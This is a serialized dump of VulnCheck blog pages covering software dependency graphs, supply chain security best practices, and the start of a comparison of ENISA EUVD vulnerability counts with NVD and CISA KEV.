As software becomes more complex, the dependency graphs enable developers to gain a clear view of all components involved, including open-source components.",[993,42427,42429],{"id":42428},"cross-file-analysis","Cross-file Analysis",[18,42431,42432],{},"A single application may incorporate code written in multiple programming languages. Cross-file analysis provides a unified view of dependencies for insight into interconnectedness across multiple files. This process tracks, documents, and accounts for all dependencies, regardless of varying file paths or appearances. By reducing blind spots in dependency tracking, developers can improve the software’s security posture.",[993,42434,42436],{"id":42435},"visibility-into-potential-vulnerabilities","Visibility into Potential Vulnerabilities",[18,42438,42439],{},"By providing visibility across different ecosystems and package relationships, dependency graphs enable developers to identify potential vulnerabilities. The graphs outline direct and transitive dependencies which AppSec teams can use to pinpoint and mitigate vulnerabilities without relying on lockfiles. By mapping indirect dependencies, AppSec teams reduce the human error risks from manual processes to make informed, data-driven security decisions.",[993,42441,42443],{"id":42442},"path-analysis","Path Analysis",[18,42445,42446],{},"Path analysis uses algorithms to map connections between components so developers can identify the chain of dependencies between two points. Developers can identify the shortest or most critical paths between two nodes which helps with debugging and performance tracing.",[993,42448,42450],{"id":42449},"impact-analysis","Impact Analysis",[18,42452,42453],{},"While path analysis tells developers how components are connected, impact analysis tells them how a change will affect the downstream dependencies. 
With an impact analysis, developers can determine the ripple effect or blast radius that refactoring or change management can have across the software.",[61,42455,42457],{"id":42456},"why-do-developers-struggle-to-build-accurate-software-dependency-graphs","Why do Developers Struggle to Build Accurate Software Dependency Graphs?",[18,42459,42460],{},"Developers often find it challenging to construct accurate software dependency graphs due to the complex nature of modern software projects. As projects grow, they involve more methods, libraries, frameworks, and components. Tasks like documenting dependencies can become tedious and overwhelming, especially without automating the process. Key contributing factors include:",[993,42462,42464],{"id":42463},"free-and-open-source-software-foss","Free and Open Source Software (FOSS)",[18,42466,42467],{},"Developers increasingly incorporate FOSS components into their software. As the number of components increases, software dependency graphs grow in size and complexity. While developers may know the direct dependencies within their source code, they often lose sight of the downstream, or transitive, dependencies that FOSS introduces.",[993,42469,42471],{"id":42470},"shadow-code","Shadow Code",[18,42473,42474],{},"Shadow code consists of untracked or unofficial dependencies in a codebase that are not part of the official dependency list. Since they are not declared in package manifests, developers have a hard time tracking and auditing them. Because they lack documentation, they can introduce security risks or licensing issues.",[993,42476,42478],{"id":42477},"decentralized-teams","Decentralized Teams",[18,42480,42481],{},"In a remote working world, developers can collaborate from anywhere. 
Decentralized development teams can make building an accurate dependency graph challenging because people managing their own modules in different tools or with different processes can lead to inconsistent or missing data that leaves a graph incomplete.",[993,42483,42485],{"id":42484},"technology-limitations","Technology Limitations",[18,42487,42488],{},"Depending on the team’s tooling, the technologies may have limitations that impact a dependency graph’s accuracy. Manifest files and lockfiles may not include all dependencies, especially if files from other sources are directly checked into a repository. Additionally, vulnerability data can be incomplete or not timely, impacting the accuracy of the dependency graph.",[61,42490,42381],{"id":42491},"best-practices-for-building-accurate-dependency-graphs",[18,42493,42494],{},"A reliable software dependency graph acts as a guide, showing each part of the code and how the parts rely on each other. With these insights, organizations can improve their application security by understanding how an attacker or a vulnerability can impact the software for improved remediation prioritization.",[993,42496,42498],{"id":42497},"use-a-software-composition-analysis-sca-tool","Use a Software Composition Analysis (SCA) Tool",[18,42500,42501],{},"SCA tools display how the different parts of software relate to each other and work together. They enable developers to automate many processes related to creating dependency graphs.",[993,42503,42505],{"id":42504},"generate-a-software-bill-of-materials-sbom","Generate a Software Bill of Materials (SBOM)",[18,42507,42508,42509,42514],{},"An SBOM lists all components and dependencies within a project, including direct and transitive dependencies. 
They use ",[47,42510,42513],{"href":42511,"rel":42512},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fvulnerability-exchange-formats",[51],"structured, hierarchical formats",", like CycloneDX, to provide a complete map of dependencies, including metadata that highlights the paths through which these dependencies are connected.",[993,42516,42518],{"id":42517},"edit-layers-and-dependencies","Edit Layers and Dependencies",[18,42520,42521],{},"Reviewing and editing the dependency graph ensures that it adequately describes the components and how they interact. Some edits may include:",[22,42523,42524,42527,42530],{},[25,42525,42526],{},"Removing unnecessary dependencies that may have been mistakenly added",[25,42528,42529],{},"Changing or restricting a dependency's direction to clarify how different software components interact with one another",[25,42531,42532],{},"Refining how each artifact relates to the various layers within the system to promote a better-organized project structure",[993,42534,42536],{"id":42535},"validate-code-against-graph","Validate Code Against Graph",[18,42538,42539],{},"Validating code against the dependency graph involves checking for any conflicts between what the code currently contains and what the diagram represents. The process helps:",[22,42541,42542,42545,42548],{},[25,42543,42544],{},"Identifying components that may be impacted by recent changes",[25,42546,42547],{},"Providing insights into code that requires further examination or modification",[25,42549,42550],{},"Ensuring a smooth transition when moving elements to different architectures",[61,42552,42554],{"id":42553},"prioritizing-remediation-with-vulncheck","Prioritizing remediation with VulnCheck",[18,42556,42557],{},"VulnCheck’s Exploit & Vulnerability Intelligence enables developers to prioritize remediation efforts by focusing on the vulnerabilities that attackers are actively exploiting. 
Our complete exploitation timelines cover the vulnerability’s initial disclosure, evidence of the first discovered exploit, and when remediation was provided.",{"title":219,"searchDepth":220,"depth":220,"links":42559},[42560,42561,42568,42574,42580],{"id":42384,"depth":220,"text":42385},{"id":42414,"depth":220,"text":42415,"children":42562},[42563,42564,42565,42566,42567],{"id":42421,"depth":1266,"text":42422},{"id":42428,"depth":1266,"text":42429},{"id":42435,"depth":1266,"text":42436},{"id":42442,"depth":1266,"text":42443},{"id":42449,"depth":1266,"text":42450},{"id":42456,"depth":220,"text":42457,"children":42569},[42570,42571,42572,42573],{"id":42463,"depth":1266,"text":42464},{"id":42470,"depth":1266,"text":42471},{"id":42477,"depth":1266,"text":42478},{"id":42484,"depth":1266,"text":42485},{"id":42491,"depth":220,"text":42381,"children":42575},[42576,42577,42578,42579],{"id":42497,"depth":1266,"text":42498},{"id":42504,"depth":1266,"text":42505},{"id":42517,"depth":1266,"text":42518},{"id":42535,"depth":1266,"text":42536},{"id":42553,"depth":220,"text":42554},"Exploit Intel 101 - Understanding Software Dependency Graphs",{"slug":42583},"understanding-software-dependency-graphs","\u002Fblog\u002Funderstanding-software-dependency-graphs",{"title":42360,"description":42581},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-software-dependency-graphs",[41494],"mfGo3PZX5iuWGzR8maNB5fmw9xLC9KsSSLRqsSVIQMk",{"id":42591,"title":42592,"articles":7,"authors":42593,"body":42595,"date":42074,"description":43043,"extension":234,"image":7,"link":7,"meta":43044,"navigation":237,"path":43046,"seo":43047,"series":43048,"stem":43049,"subtype":7,"tags":43050,"__hash__":43051},"blog\u002Fblog\u002Funderstanding-software-supply-chain-security.md","Understanding Software Supply Chain 
Security",[42594],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":42596,"toc":43027},[42597,42600,42617,42620,42624,42627,42630,42656,42660,42663,42666,42692,42696,42705,42772,42775,42809,42813,42816,42848,42852,42855,42875,42879,42882,42885,42917,42921,42924,42928,42931,42942,42946,42949,42960,42964,42967,42978,42982,42985,42999,43003,43006,43020,43024],[18,42598,42599],{},"This knowledgebase article will cover:",[22,42601,42602,42605,42608,42611,42614],{},[25,42603,42604],{},"Definitions for software supply chain and software supply chain security",[25,42606,42607],{},"Where software supply chain risks fall on the OWASP Top 10",[25,42609,42610],{},"Why the software supply chain is vulnerable to attack",[25,42612,42613],{},"Sources of supply chain security risks",[25,42615,42616],{},"Best practices for mitigating risk",[18,42618,42619],{},"The software supply chain refers to the network of components, tools, processes, and third-party services involved in developing, building, and delivering software. Recognizing the importance of these tools and components, attackers increasingly target the software supply chain. 
By focusing attention on software supply chain security, organizations can reduce data breach risks arising from these attacks.",[61,42621,42623],{"id":42622},"what-is-the-software-supply-chain","What is the Software Supply Chain?",[18,42625,42626],{},"The software supply chain comprises a variety of code, libraries, dependencies, and infrastructure, which is used throughout the development lifecycle.",[18,42628,42629],{},"Key components include:",[22,42631,42632,42638,42644,42650],{},[25,42633,42634,42637],{},[295,42635,42636],{},"Source code",": Original code to build the software’s or application’s core functionalities.",[25,42639,42640,42643],{},[295,42641,42642],{},"Third-party dependencies and libraries",": Proprietary and open-source tools, libraries, and components integrated into source code to save developers time.",[25,42645,42646,42649],{},[295,42647,42648],{},"Build and packaging processes",": Compiling the code and packages into a deployable software.",[25,42651,42652,42655],{},[295,42653,42654],{},"Deployment infrastructure",": Releasing the software or application on cloud platforms or on-premises servers so people can use it.",[61,42657,42659],{"id":42658},"what-is-software-supply-chain-security","What is Software Supply Chain Security?",[18,42661,42662],{},"Software supply chain security is the practice of reviewing and protecting every component across the software development life cycle (SDLC) from compromise, tampering, or unauthorized access.",[18,42664,42665],{},"As attackers increasingly insert malicious code into or otherwise compromise third-party libraries, organizations need to mitigate risk by:",[22,42667,42668,42674,42680,42686],{},[25,42669,42670,42673],{},[295,42671,42672],{},"Protecting source code",": Securing the original code against unauthorized access",[25,42675,42676,42679],{},[295,42677,42678],{},"Identifying dependencies and libraries",": Reviewing third-party and open-source components for potential 
vulnerabilities",[25,42681,42682,42685],{},[295,42683,42684],{},"Engaging in real-time monitoring",": Leveraging threat intelligence to constantly observe the software supply chain for new threats",[25,42687,42688,42691],{},[295,42689,42690],{},"Automating audits",": Scanning code and all third-party components to identify and remediate vulnerabilities",[61,42693,42695],{"id":42694},"which-top-10-security-risks-involve-issues-with-the-software-supply-chain","Which Top 10 Security Risks Involve Issues with the Software Supply Chain?",[18,42697,42698,42699,42704],{},"OWASP offers several Top 10 lists that highlight key security risks across different areas of application security. The ",[47,42700,42703],{"href":42701,"rel":42702},"https:\u002F\u002Fowasp.org\u002Fwww-project-open-source-software-top-10\u002F",[51],"OWASP Top 10 Risks for Open Source Software (OSS)"," outlines the biggest security risks in open source code, helping address key threats in the software supply chain. The Top 10 OSS Risks include the following:",[22,42706,42707,42713,42719,42725,42731,42737,42748,42754,42760,42766],{},[25,42708,42709,42712],{},[295,42710,42711],{},"OSS-RISK-1 Known Vulnerabilities",": Component contains publicly disclosed vulnerabilities, like those published through CVE, GitHub Security Advisories, or other channels.",[25,42714,42715,42718],{},[295,42716,42717],{},"OSS-RISK-2 Compromise of Legitimate Packages",": Attackers compromise parts of legitimate projects or their distribution infrastructure to inject malicious code.",[25,42720,42721,42724],{},[295,42722,42723],{},"OSS-RISK-3 Name Confusion Attacks",": Attackers create components with fake but similar names (typo-squatting), suggesting trustworthy authors (brand-jacking), or playing with common naming patterns (combo-squatting).",[25,42726,42727,42730],{},[295,42728,42729],{},"OSS-RISK-4 Unmaintained Software",": Component or component version is no longer actively updated to provide 
patches.",[25,42732,42733,42736],{},[295,42734,42735],{},"OSS-RISK-5 Outdated Software",": Project uses outdated component versions despite a newer version’s availability.",[25,42738,42739,42742,42743,27987],{},[295,42740,42741],{},"OSS-RISK-6 Untracked Dependencies",": Developers are unaware of a component dependency, like not having it in an upstream component’s ",[47,42744,42747],{"href":42745,"rel":42746},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulnerability-exchange-formats#software-bill-of-materials-sbom",[51],"Software Bill of Materials (SBOM",[25,42749,42750,42753],{},[295,42751,42752],{},"OSS-RISK-7 License Risk",": Component or project lacks a license or uses one incompatible with the developer’s intended use.",[25,42755,42756,42759],{},[295,42757,42758],{},"OSS-RISK-8 Immature Software",": Project fails to apply development best practices, impacting component reliability and security.",[25,42761,42762,42765],{},[295,42763,42764],{},"OSS-RISK-9 Unapproved Change",": Changes to components occur without developers noticing, reviewing, or approving them.",[25,42767,42768,42771],{},[295,42769,42770],{},"OSS-RISK-10 Under\u002FOver-Sized Dependency",": Component provides too little or too much functionality.",[18,42773,42774],{},"Additionally, some examples of OWASP Top 10 Risks related to the software supply chain across other lists include:",[22,42776,42777,42789,42799],{},[25,42778,42779,42786,42788],{},[47,42780,42783],{"href":42781,"rel":42782},"https:\u002F\u002Fowasp.org\u002Fwww-project-kubernetes-top-ten\u002F2022\u002Fen\u002Fsrc\u002FK02-supply-chain-vulnerabilities",[51],[295,42784,42785],{},"Kubernetes Top 10 (K02)",[295,42787,4606],{}," A container can rely on various third-party components and dependencies that can lead to security issues arising from a lack of image integrity, problems with image composition, and known software 
vulnerabilities.",[25,42790,42791,42798],{},[47,42792,42795],{"href":42793,"rel":42794},"https:\u002F\u002Fowasp.org\u002Fwww-project-mobile-top-10\u002F2023-risks\u002Fm2-inadequate-supply-chain-security.html",[51],[295,42796,42797],{},"Mobile Application Top 10 (M2)",": Attackers can exploit vulnerabilities arising from a lack of secure coding practices, insufficient code reviews, insufficient or insecure app signing and distribution processes, vulnerabilities in third-party software components or libraries, sensitive data exposure, or insufficient security controls across data, encryption, storage.",[25,42800,42801,42808],{},[47,42802,42805],{"href":42803,"rel":42804},"https:\u002F\u002Fowasp.org\u002Fwww-project-machine-learning-security-top-10\u002Fdocs\u002FML06_2023-AI_Supply_Chain_Attacks.html",[51],[295,42806,42807],{},"Machine Learning (ML) Model Top 10 (ML06)",": As the ML supply chain includes more elements than traditional software, attackers can target the traditional supply chain as well as MLOps platforms, data management platforms, model management software, model hubs, and tools for testing and deploying software.",[61,42810,42812],{"id":42811},"why-is-the-software-supply-chain-vulnerable-to-attack","Why is the Software Supply Chain Vulnerable to Attack?",[18,42814,42815],{},"Attackers seek to exploit weaknesses across the development and deployment processes, especially since software supply chains contain complex interactions between different components, libraries, and environments. 
Vulnerabilities are typically defined across the following areas:",[22,42817,42818,42824,42830,42836,42842],{},[25,42819,42820,42823],{},[295,42821,42822],{},"Infrastructure vulnerabilities",": Configuration problems in hardware and software systems, including servers, virtual machines, and network devices.",[25,42825,42826,42829],{},[295,42827,42828],{},"Software vulnerabilities:"," Flawed code arising from bugs or faults in proprietary and open-source software, often through dependency confusion where systems download malicious code instead of legitimate libraries.",[25,42831,42832,42835],{},[295,42833,42834],{},"Codebase vulnerabilities",": Harmful code introduced into the underlying software, often through dependency confusion or hijacked updates.",[25,42837,42838,42841],{},[295,42839,42840],{},"Human error or malicious insider intent",": Tricking people into downloading malicious components, like with typosquatting, or insiders who purposefully introduce vulnerabilities.",[25,42843,42844,42847],{},[295,42845,42846],{},"Process vulnerabilities:"," Flaws in established protocols, like failure to properly test or review source code.",[61,42849,42851],{"id":42850},"why-do-organizations-face-risk-from-software-supply-chain-attacks","Why do Organizations Face Risk from Software Supply Chain Attacks?",[18,42853,42854],{},"Attackers target the software supply chain because the complex, interconnected dependencies across software tools and services create vulnerabilities that are difficult to detect. 
Some reasons that organizations often face increased risk include:",[22,42856,42857,42863,42869],{},[25,42858,42859,42862],{},[295,42860,42861],{},"Short release cycles and rapid iterations",": Agile development practices often mean that application security (AppSec) and DevOps teams struggle to track and manage security issues, especially as the use of open source code expands the risk surface.",[25,42864,42865,42868],{},[295,42866,42867],{},"Traditional AppSec processes fall behind",": Accelerated SDLCs, complex applications, and everything-as-code trends make identifying and remediating vulnerabilities difficult as AppSec teams need automated tools to address persistent gaps.",[25,42870,42871,42874],{},[295,42872,42873],{},"Alert fatigue and software supply chain complexity",": High volumes of false positive alerts leave security and AppSec teams struggling to prioritize and respond to issues across complex applications that include third-party components, application programming interfaces (APIs), and open source libraries.",[61,42876,42878],{"id":42877},"what-are-some-sources-of-software-supply-chain-risk","What are Some Sources of Software Supply Chain Risk?",[18,42880,42881],{},"As the software supply chain risks continue to grow, organizations need to ensure the security of all components to mitigate attack risks.",[18,42883,42884],{},"When trying to reduce risk, organizations should consider the following sources:",[22,42886,42887,42893,42899,42905,42911],{},[25,42888,42889,42892],{},[295,42890,42891],{},"Open-source libraries",": Lack of change management processes and documentation can lead to hidden vulnerabilities without incorporating automation like software composition analysis (SCA) tools to help identify, manage, and remediate them.",[25,42894,42895,42898],{},[295,42896,42897],{},"Secrets leaks",": Developers can accidentally leave sensitive information in the source code, including passwords and API keys, that attackers can use to compromise the 
application.",[25,42900,42901,42904],{},[295,42902,42903],{},"CI\u002FCD pipeline",": Attackers can exploit vulnerabilities in the continuous integration, continuous delivery (CI\u002FCD) pipeline tools that build and test code, making unauthorized changes to source code.",[25,42906,42907,42910],{},[295,42908,42909],{},"Malicious packages in public registries",": Attackers increasingly target public registries, like the Python Package Index (PyPI) and the JavaScript package manager NPM, by uploading malicious packages with seemingly legitimate names that developers then install.",[25,42912,42913,42916],{},[295,42914,42915],{},"Malicious installation scripts",": Attackers inject malicious installation scripts into software packages so that they run during setup to compromise entire systems.",[61,42918,42920],{"id":42919},"best-practices-for-mitigating-software-supply-chain-risks","Best Practices for Mitigating Software Supply Chain Risks",[18,42922,42923],{},"Security teams, developers, and AppSec teams need to collaborate effectively and build risk management into all processes, from development to deployment. By following best practices, organizations can mitigate risk across the software supply chain, including those arising from malicious attacks and potential vulnerability exploits.",[993,42925,42927],{"id":42926},"implement-security-controls-for-the-development-environment","Implement Security Controls for the Development Environment",[18,42929,42930],{},"Integrating security controls for the development environment is similar to how the organization protects the production environment. 
Some typical risk mitigation strategies include:",[22,42932,42933,42936,42939],{},[25,42934,42935],{},"Applying the principle of least privilege by limiting user access to only the resources people need to complete their job functions.",[25,42937,42938],{},"Integrating security tools and standards into each phase of development.",[25,42940,42941],{},"Automating security tasks with CI\u002FCD pipelines.",[993,42943,42945],{"id":42944},"implement-secure-software-development-practices","Implement Secure Software Development Practices",[18,42947,42948],{},"Implementing secure coding standards helps protect against common security flaws. Some actions that organizations can take include:",[22,42950,42951,42954,42957],{},[25,42952,42953],{},"Using automated vulnerability detection tools.",[25,42955,42956],{},"Ensuring software artifact integrity and authenticity with code signing.",[25,42958,42959],{},"Tracking component versions to ensure they use the most secure ones.",[993,42961,42963],{"id":42962},"use-an-sca-tool-to-help-generate-accurate-sboms","Use an SCA Tool to Help Generate Accurate SBOMs",[18,42965,42966],{},"An SBOM acts as a formal record of software components, their relationships, and potential vulnerabilities. Developers can use SCA tools to analyze software applications to identify open-source components and third-party dependencies to expose vulnerabilities that would otherwise be overlooked. 
When implementing an SCA solution, organizations should ensure that it enables them to:",[22,42968,42969,42972,42975],{},[25,42970,42971],{},"Compare open-source packages against vulnerability databases.",[25,42973,42974],{},"Offer remediation guidance.",[25,42976,42977],{},"Integrate into developer workflows.",[993,42979,42981],{"id":42980},"establish-vulnerability-and-patch-management-processes","Establish Vulnerability And Patch Management Processes",[18,42983,42984],{},"Between the development environment and the source code, organizations need to implement vulnerability and patch management processes that:",[22,42986,42987,42990,42993,42996],{},[25,42988,42989],{},"Use the SCA solution to scan source code for third-party components and libraries that contain known vulnerabilities.",[25,42991,42992],{},"Scan containers to identify potential vulnerabilities.",[25,42994,42995],{},"Implement dynamic and static application security testing to look for potential vulnerabilities.",[25,42997,42998],{},"Prioritize remediation activities based on asset criticality or component reachability.",[993,43000,43002],{"id":43001},"engage-in-third-party-risk-assessments","Engage in Third-Party Risk Assessments",[18,43004,43005],{},"As the organization implements more devices and applications, third-party vendor risk assessments increasingly need to incorporate monitoring for software supply chain risks. 
As part of evaluating a vendor, organizations should consider:",[22,43007,43008,43011,43014,43017],{},[25,43009,43010],{},"Software development lifecycle processes and controls",[25,43012,43013],{},"Corporate security posture",[25,43015,43016],{},"Vulnerability history, including reporting vulnerabilities and providing security updates",[25,43018,43019],{},"Response strategies, including notifying customers about potential security incidents impacting development environments",[61,43021,43023],{"id":43022},"mitigate-supply-chain-security-risks-vulncheck","Mitigate Supply Chain Security Risks with VulnCheck",[18,43025,43026],{},"VulnCheck enables security teams to manage vulnerability and risk with the largest real-time collection of known exploited vulnerabilities, including additional context into and evidence-based evaluation of exploits. It also enables developers to integrate SBOMs and vulnerability reporting into their workflows so that they can regularly monitor for and mitigate software supply chain risks.",{"title":219,"searchDepth":220,"depth":220,"links":43028},[43029,43030,43031,43032,43033,43034,43035,43042],{"id":42622,"depth":220,"text":42623},{"id":42658,"depth":220,"text":42659},{"id":42694,"depth":220,"text":42695},{"id":42811,"depth":220,"text":42812},{"id":42850,"depth":220,"text":42851},{"id":42877,"depth":220,"text":42878},{"id":42919,"depth":220,"text":42920,"children":43036},[43037,43038,43039,43040,43041],{"id":42926,"depth":1266,"text":42927},{"id":42944,"depth":1266,"text":42945},{"id":42962,"depth":1266,"text":42963},{"id":42980,"depth":1266,"text":42981},{"id":43001,"depth":1266,"text":43002},{"id":43022,"depth":220,"text":43023},"Exploit Intel 101 - Understanding Software Supply Chain 
Security",{"slug":43045},"understanding-software-supply-chain-security","\u002Fblog\u002Funderstanding-software-supply-chain-security",{"title":42592,"description":43043},{"title":41489,"color":41490,"icon":41491},"blog\u002Funderstanding-software-supply-chain-security",[41494],"ktlzirlO0eIZDtPPVdNEPkIfXsyj0s7B4l7AdKnwNAc",{"id":43053,"title":43054,"articles":7,"authors":43055,"body":43057,"date":43720,"description":43721,"extension":234,"image":7,"link":7,"meta":43722,"navigation":237,"path":43724,"seo":43725,"series":7,"stem":43726,"subtype":7,"tags":43727,"__hash__":43728},"blog\u002Fblog\u002Fenisa-euvd.md","Does ENISA EUVD live up to all the hype?",[43056],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":43058,"toc":43694},[43059,43068,43071,43074,43077,43081,43084,43087,43090,43094,43117,43121,43124,43128,43131,43151,43154,43178,43181,43185,43188,43191,43195,43198,43203,43248,43252,43255,43258,43261,43264,43268,43271,43274,43277,43282,43318,43321,43324,43328,43332,43335,43343,43347,43350,43353,43356,43416,43420,43423,43440,43448,43451,43455,43459,43468,43472,43475,43478,43508,43511,43617,43621,43624,43627,43631,43640,43643,43647,43655,43662,43665,43669,43672,43676,43679,43681,43683,43691],[18,43060,43061,43062,43067],{},"Last week’s announcement from ",[47,43063,43066],{"href":43064,"rel":43065},"https:\u002F\u002Fwww.enisa.europa.eu\u002Fnews\u002Fconsult-the-european-vulnerability-database-to-enhance-your-digital-security",[51],"ENISA"," resulted in a lot of hype around the launch of its European Vulnerability Database (EUVD), which officially went live on May 13, 2025.",[18,43069,43070],{},"Given the criticality of the challenges the market is responding to over the issues at MITRE, NIST and CISA relative to the overall CVE program, I decided to take a closer look and evaluate the new service.",[18,43072,43073],{},"At VulnCheck, evaluating new and existing sources of vulnerability and exploit intelligence is a routine part of my work. 
So, this is nothing new. Today, we collect hundreds of millions of records from more than 500 sources, and our amazing engineering team manages the collection and curation of this data to help organizations counter emerging threats.",[18,43075,43076],{},"What many readers may not realize, however, is that government-funded vulnerability advisory services and databases are not new. In addition to ENISA’s EUVD, VulnCheck has had long-standing initiatives to include Russia’s BDU, China’s CNVD & CNNVD, Japan’s JVN (including JVN iPedia), the NIST NVD in the U.S., and various national CERTs, most of which have been providing vulnerability data for years.",[61,43078,43080],{"id":43079},"why-i-decided-to-publish-this-research-so-soon","Why I Decided to Publish This Research So Soon",[18,43082,43083],{},"Following the funding crisis at CVE.org in April and the ongoing resource constraints at NIST's National Vulnerability Database (NVD), many organizations are actively exploring alternative sources for vulnerability information.",[18,43085,43086],{},"We’ve been fielding a lot of inquiries about this topic. 
With the recent launch of ENISA’s vulnerability database, a common question has emerged: Is ENISA a viable alternative to CVE.org and the NIST NVD?",[18,43088,43089],{},"This research aims to share experiences and observations to help others better understand how ENISA compares and whether it can serve as a reliable alternative for these established services.\nThis feedback and insight is incredibly important for ENISA’s consideration, which could help them improve their service to make it a more viable alternative data source to CVE.org and NIST NVD. With the coming regulatory requirements of CRA, this database becomes a critical source for organizations doing business in the EU.",[61,43091,43093],{"id":43092},"key-findings","Key Findings",[22,43095,43096,43099,43102,43105,43108,43111,43114],{},[25,43097,43098],{},"EUVD is a strategically important resource aligned with the upcoming Cyber Resilience Act (CRA), making it increasingly relevant for organizations operating in the EU.",[25,43100,43101],{},"EUVD API and website limitations present fewer vulnerabilities than CVE.org\u002FNIST NVD, with more than 50,000 CVEs not surfaced via its main vulnerabilities API endpoint, though many are present on the website and most appear to be available through direct search\u002Fquery.",[25,43103,43104],{},"The exploited vulnerabilities listed in EUVD mirror CISA KEV but omit some entries on their website, offering narrower visibility than sources like VulnCheck.",[25,43106,43107],{},"The current EUVD API presents performance constraints and limited support for high-volume or automated use, which may impact operational workflows.",[25,43109,43110],{},"Important metadata, such as CWE, CPE, and CVSS Source, is not yet available, reducing EUVD’s utility for in-depth risk analysis.",[25,43112,43113],{},"The implementation of EPSS includes scoring modifications that introduce the possibility of misleading downstream consumers.",[25,43115,43116],{},"Though launched as “operational,” 
the database is still labeled “beta,” signaling that it is an evolving platform and doesn't appear to be ready for production-level dependency.",[61,43118,43120],{"id":43119},"vulnerability-count-confusion","Vulnerability Count Confusion",[18,43122,43123],{},"When analyzing a new source of vulnerability and exploitation intelligence, my first instinct is to look at raw counts. This provides a foundational comparison point with existing sources. This led to some rather confusing findings in the case of ENISA's EUVD.",[993,43125,43127],{"id":43126},"initial-observation","Initial Observation",[18,43129,43130],{},"Two specific counts stood out to me:",[22,43132,43133,43136,43139,43142],{},[25,43134,43135],{},"The total number of vulnerabilities.",[25,43137,43138],{},"The total number of exploited vulnerabilities.\nI used two approaches to gather these numbers:",[25,43140,43141],{},"Reviewing the raw counts on the EUVD website.",[25,43143,43144,43145,43150],{},"Querying the ",[47,43146,43149],{"href":43147,"rel":43148},"https:\u002F\u002Feuvdservices.enisa.europa.eu\u002Fapi\u002Fvulnerabilities",[51],"EUVD vulnerabilities API"," and comparing results with CVE.org and the NIST NVD.",[18,43152,43153],{},"When querying the EUVD vulnerabilities API endpoint, I received the following response:",[1354,43155,43157],{"className":22307,"code":43156,"language":22309,"meta":219,"style":219},"\"total\": 243,969\n",[886,43158,43159],{"__ignoreMap":219},[1373,43160,43161,43163,43166,43168,43170,43173,43175],{"class":1375,"line":1376},[1373,43162,183],{"class":1387},[1373,43164,43165],{"class":1391},"total",[1373,43167,183],{"class":1387},[1373,43169,20051],{"class":4640},[1373,43171,43172],{"class":5467},"243",[1373,43174,5437],{"class":4640},[1373,43176,43177],{"class":5467},"969\n",[18,43179,43180],{},"This immediately raised a red flag: why are over 50,000 CVEs not included in the ENISA vulnerabilities API 
endpoint?",[993,43182,43184],{"id":43183},"verifying-vulnerability-counts-via-the-website","Verifying Vulnerability Counts via the Website",[18,43186,43187],{},"To investigate further, I checked the EUVD website directly. Navigating to the \"Full Vulnerability List\" and accessing the last page (page 26,492), I found that each page displays 10 records. This gives us: 26,492 pages × 10 records = 264,920 vulnerabilities.",[18,43189,43190],{},"Still, this number is well below the total CVE count published to date.",[993,43192,43194],{"id":43193},"vulnerability-count-comparison-as-of-may-17","Vulnerability Count Comparison (as of May 17)",[18,43196,43197],{},"To put things in perspective, here’s a side-by-side comparison of vulnerability counts across ENISA EUVD’s website, EUVD’s vulnerability API, NIST NVD total count, and NIST NVD total count w\u002Fo rejected :",[18,43199,43200],{},[295,43201,43202],{},"Vulnerability Count as of May 17th",[307,43204,43205,43214],{},[310,43206,43207],{},[313,43208,43209,43211],{},[316,43210,2468],{},[316,43212,43213],{},"Vulnerability Count",[336,43215,43216,43224,43232,43240],{},[313,43217,43218,43221],{},[341,43219,43220],{},"ENISA EUVD (website)",[341,43222,43223],{},"264,920",[313,43225,43226,43229],{},[341,43227,43228],{},"ENISA EUVD (vulnerabilities API)",[341,43230,43231],{},"243,969",[313,43233,43234,43237],{},[341,43235,43236],{},"NIST NVD Total",[341,43238,43239],{},"294,484",[313,43241,43242,43245],{},[341,43243,43244],{},"NIST NVD (w\u002Fo Rejected)",[341,43246,43247],{},"279,338",[993,43249,43251],{"id":43250},"finding-the-missing-vulnerabilities","Finding the Missing Vulnerabilities",[18,43253,43254],{},"As a researcher, I naturally wanted to understand which 50,000+ CVEs were not returned from the ENISA EUVD vulnerabilities API.",[18,43256,43257],{},"To dig deeper, I compared the full set of NIST NVD’s 294,484 with the CVEs presented in the vulnerabilities API endpoint. 
From this comparison, I compiled a list of CVEs that were not returned from the endpoint.",[18,43259,43260],{},"While analyzing this dataset, I noticed vulnerabilities with an EPSS score greater than .1 are missing from the vulnerabilities API endpoint, which account for 20,559 of the missing vulnerabilities. For those not familiar with EPSS, higher scores have a higher likelihood that a software vulnerability will be exploited in the wild.",[18,43262,43263],{},"After a quick spot check using the ENISA EUVD website’s search interface, I confirmed that many of these CVEs were, in fact, available through the website's search function and available for direct query using the direct query vulnerability API endpoint. So the data exists, it’s just not presented in the vulnerabilities API or the website in many cases and requires you to have a complete list of CVE IDs or ENISA IDs to pull the data.",[993,43265,43267],{"id":43266},"further-exploring-exploited-vulnerability-counts","Further Exploring Exploited Vulnerability Counts",[18,43269,43270],{},"Exploring exploited vulnerabilities and discovering new data sources is one of my favorite areas of research. So, when a new resource from a reputable organization like ENISA comes online, I’m always eager to dig in and see what it adds to the ecosystem.",[18,43272,43273],{},"Unfortunately, I was disappointed to find that the ENISA EUVD Exploited Vulnerabilities list is merely a subset of CISA’s Known Exploited Vulnerabilities (KEV). 
That immediately raised a question: why are some CISA KEV entries not listed on EUVD’s all exploited vulnerabilities dashboard?",[18,43275,43276],{},"To investigate, I used the same methodology as with total vulnerability counts comparing raw numbers across sources.",[18,43278,43279],{},[295,43280,43281],{},"Exploited Vulnerabilities As of May 17",[307,43283,43284,43294],{},[310,43285,43286],{},[313,43287,43288,43291],{},[316,43289,43290],{},"Exploited Vulnerability Source",[316,43292,43293],{},"CVE Count",[336,43295,43296,43304,43311],{},[313,43297,43298,43301],{},[341,43299,43300],{},"ENISA EUVD Exploited Vulnerabilities (Website)",[341,43302,43303],{},"1,270",[313,43305,43306,43308],{},[341,43307,31643],{},[341,43309,43310],{},"1,345",[313,43312,43313,43315],{},[341,43314,1233],{},[341,43316,43317],{},"3,672",[18,43319,43320],{},"I manually validated that every exploited vulnerability listed by ENISA is also present in the CISA KEV list, confirming it's a strict subset. However, this leaves 75 CISA KEV vulnerabilities unaccounted for in ENISA’s dashboard that includes “all exploited vulnerabilities”.",[18,43322,43323],{},"When I used the search functionality for these individual CVEs using the EUVD website’s search function, the results were returned, aligning with the same experience I had with 